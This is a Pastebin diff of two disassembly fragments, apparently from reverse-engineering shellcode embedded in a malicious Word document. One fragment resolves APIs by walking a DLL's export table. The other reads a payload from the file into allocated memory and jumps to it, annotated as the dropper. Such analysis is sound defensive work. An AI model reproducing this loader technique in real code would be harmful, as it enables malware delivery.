API tools faq
paste
View difference between Paste ID: c7TX06U0 and gDai8q8j
SHOW: | | - or go back to the newest paste.
1-
Stack[00000650]:00121CDA decrypt_:                               ; CODE XREF: Stack[00000650]:00121D2Dp
1+
debug016:00350157 loc_350157:                             ; CODE XREF: debug016:0035014Aj
2-
Stack[00000650]:00121CDA pusha
2+
debug016:00350157 push    0
3-
Stack[00000650]:00121CDB mov     ebp, [esp+24h]
3+
debug016:00350159 push    0
4-
Stack[00000650]:00121CDF mov     eax, [ebp+3Ch]
4+
debug016:0035015B push    dword ptr [ebp-18h]
5-
Stack[00000650]:00121CE2 mov     edx, [ebp+eax+78h]
5+
debug016:0035015E push    dword ptr [ebp-4]
6-
Stack[00000650]:00121CE6 add     edx, ebp
6+
debug016:00350161 call    dword ptr [ebp-40h]             ; call SetFilePointer
7-
Stack[00000650]:00121CE8 mov     ecx, [edx+18h]                  ; Number of function;
7+
debug016:00350164 push    dword ptr [ebp-14h]
8-
Stack[00000650]:00121CEB mov     ebx, [edx+20h]                  ; Export Name Table(ENT)
8+
debug016:00350167 push    40h
9-
Stack[00000650]:00121CEE add     ebx, ebp
9+
debug016:00350169 call    dword ptr [ebp-34h]             ; call GlobalAlloc
10-
Stack[00000650]:00121CF0
10+
debug016:0035016C mov     [ebp-0Ch], eax                  ; Allocate 7B2 bytes
11-
Stack[00000650]:00121CF0 loc_121CF0:                             ; CODE XREF: Stack[00000650]:00121D0Dj
11+
debug016:0035016F push    0
12-
Stack[00000650]:00121CF0 jecxz   short loc_121D28
12+
debug016:00350171 lea     eax, [ebp-1Ch]
13-
Stack[00000650]:00121CF2 dec     ecx
13+
debug016:00350174 push    eax
14-
Stack[00000650]:00121CF3 mov     esi, [ebx+ecx*4]
14+
debug016:00350175 push    dword ptr [ebp-14h]             ; size=0x7B2
15-
Stack[00000650]:00121CF6 add     esi, ebp
15+
debug016:00350178 push    dword ptr [ebp-0Ch]             ; Buffer
16-
Stack[00000650]:00121CF8 xor     edi, edi
16+
debug016:0035017B push    dword ptr [ebp-4]               ; hFile
17-
Stack[00000650]:00121CFA xor     eax, eax
17+
debug016:0035017E call    dword ptr [ebp-3Ch]             ; call ReadFile
18-
Stack[00000650]:00121CFC cld
18+
debug016:00350181 mov     eax, [ebp-0Ch]
19-
Stack[00000650]:00121CFD
19+
debug016:00350184
20-
Stack[00000650]:00121CFD loc_121CFD:                             ; CODE XREF: Stack[00000650]:00121D07j
20+
debug016:00350184 JMP_To_Dropper_:                        ; Jump to dropper in .DOC
21-
Stack[00000650]:00121CFD lodsb
21+
debug016:00350184 jmp     eax
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!